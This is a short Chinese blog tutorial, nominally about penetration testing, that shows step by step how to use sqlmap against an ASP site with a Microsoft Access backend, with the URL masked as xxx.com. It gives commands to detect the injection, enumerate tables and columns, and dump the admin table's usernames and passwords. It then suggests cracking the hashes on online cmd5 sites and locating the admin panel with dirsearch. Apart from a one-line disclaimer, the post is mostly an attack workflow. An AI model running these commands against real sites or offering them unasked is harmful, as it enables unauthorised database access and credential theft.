特殊说明:本文档以技术角度出发,勿用于非法用途。
我们以ASP网站为例,对网站的安全进行渗透测试。
所使用的方法是SQL注入,在渗透测试之前准备好测试的网站以及自动化工具
SQLMAP自动化注入检测
♾️ text 代码:# 检测是否存在SQL注入漏洞(这里将网址替换为XXX)
# -u 参数为后根网站URL
sqlmap -u "http://www.xxx.com/bxnews.asp?id=1150"
在检测结果后,如果出现操作系统及数据库信息时,说明我们找到了合适的目标,如下图所示:
web server operating system: Windows 7 or 2008 R2 操作系统类型
web application technology: ASP, Microsoft IIS 7.5, ASP.NET 开发语言
back-end DBMS: Microsoft Access 数据库类型
然后通过枚举方法进行数据库名称的猜测撞库。
♾️ text 代码:# 枚举数据库名称(这里将网址替换为XXX)
# --tables 标记为数据库名称
sqlmap -u "http://www.xxx.com/bxnews.asp?id=1150" --tables
图中可以看出,我们已经找到表名[admin],可在其中选择认为有意义的表名。然后接就是对表中列进行枚举。
♾️ text 代码:# 枚举字段(这里将网址替换为XXX)
sqlmap -u "http://www.xxx.com/bxnews.asp?id=1150" --columns -T "admin"
在图中看到存在的敏感字段。接下来我们就继续查看详细的内容。
♾️ text 代码:# 查看帐户信息(这里将网址替换为XXX)
sqlmap -u "http://www.xxx.com/bxnews.asp?id=1150" --dump -C "admin,password,user" -T "admin"
可以看出,密码是经过加密的,我们可以到某些cmd5网站在线破解。
最后通过dirsearch扫出后台地址。
博主
小野